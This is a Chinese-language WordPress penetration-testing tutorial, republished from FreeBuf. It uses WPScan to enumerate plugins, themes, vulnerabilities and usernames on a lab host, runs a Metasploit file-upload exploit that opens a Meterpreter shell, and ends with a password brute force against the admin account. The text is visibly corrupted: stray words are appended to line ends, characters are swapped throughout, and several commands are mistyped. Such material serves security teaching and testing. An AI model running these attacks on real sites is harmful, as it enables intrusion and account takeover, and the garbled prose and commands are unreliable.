转载自FreeBuf.COMphp
严正声明:本文仅限于技术探讨,严禁用于其余目的。html
在这篇文章中,我将告诉你们如何使用WPScan来对WordPress站点进行安全测试。nginx
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,可以扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress自己的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,而且支持最新版本的WordPress。值得注意的是,它不只可以扫描相似robots.txt这样的敏感文件,并且还可以检测当前已启用的插件和其余功能。git
接下来,让咱们进入正题…github
Kali Linux默认自带了WPScan,你也可使用下列命令在本身的设备中安装WPScan:web
git clone https://github.com/wpscanteam/wpscan.git
切换到WPScan目录中,运行下列命令查看帮助信息:数据库
./wpscan.rb–h
你也可使用如下命令更新漏洞库:安全
wpscan -update
咱们可使用–enumerate选项来扫描并发现关于目标站点主题、插件和用户名信息。输入下列命令开始对服务器进行扫描:ruby
./wpscan.rb –u http://192.168.0.101/wordpress/
若是你不知道目标服务器的IP地址,你能够直接输入URL地址。下面给出的是扫描结果:服务器
从结果中能够看到,服务器信息为Apache/2.4.6,PHP /5.5.9,WordPress v4.8.1。咱们还发现,上传目录开启了目录监听功能,所以任何人均可以经过访问wp-content/uploads来查看目录中的上传内容。
使用下列命令对主题进行扫描:
./wpsca.rb –u http://192.168.0.101/wordpress --enumerate t
使用下列命令扫描主题中存在的漏洞:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vt
插件能够扩展WordPress站点的功能,但不少插件中都存在安全漏洞,而这也会给攻击者提供可乘之机。
咱们可使用下列命令扫描WordPress站点中安装的插件:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate p
咱们能够看到该网站中安装了Akismet v3.3.3,pixbay-images v2.14,wptouch v3.4.3以及不少其余的插件。
接下来,咱们可使用下列命令来扫描目标插件中的安全漏洞:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate vp
咱们能够从扫描结果中看到这三款插件中存在的漏洞以及利用路径:
接下来,咱们将用第一个插件中的任意文件上传漏洞来进行漏洞利用演示,该漏洞容许咱们上传恶意文件并实现远程代码执行。
打开终端窗口并输入下列命令:
useexploit/unix/webapp/wp_reflexgallery_file_upload msfexploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101 msfexploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/ msfexploit(wp_reflexgallery_file_upload) > exploit
你将看到终端与目标设备创建了Meterpreter会话,你能够输入下列命令查看目标系统信息:
Sysinfo
咱们能够在终端中输入下列命令来枚举WordPress用户名:
./wpscan.rb -u http://192.168.0.101/wordpress/ --enumerate u
接下来工具将导出用户名数据表,你能够看到用户名以及对应的ID信息。
固然了,你也可使用下列命令枚举出全部的内容:
./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u –e at : enumerate all themes of targeted website –e ap: enumerate all plugins of targeted website –e u: enumerate all usernames of targeted website
在进行暴力破解攻击以前,咱们须要建立对应的字典文件。输入下列命令:
./wpscan.rb –u http://192.168.0.101/wordpress/ --wordlist /root/Desktop/dict.txt --usernameadmin
若是找到了相匹配的用户名与密码,工具将直接以admin:password的形式显示出来:
* 参考来源:hackmydevice,FB小编Alpha_h4ck编译,转载自FreeBuf.COM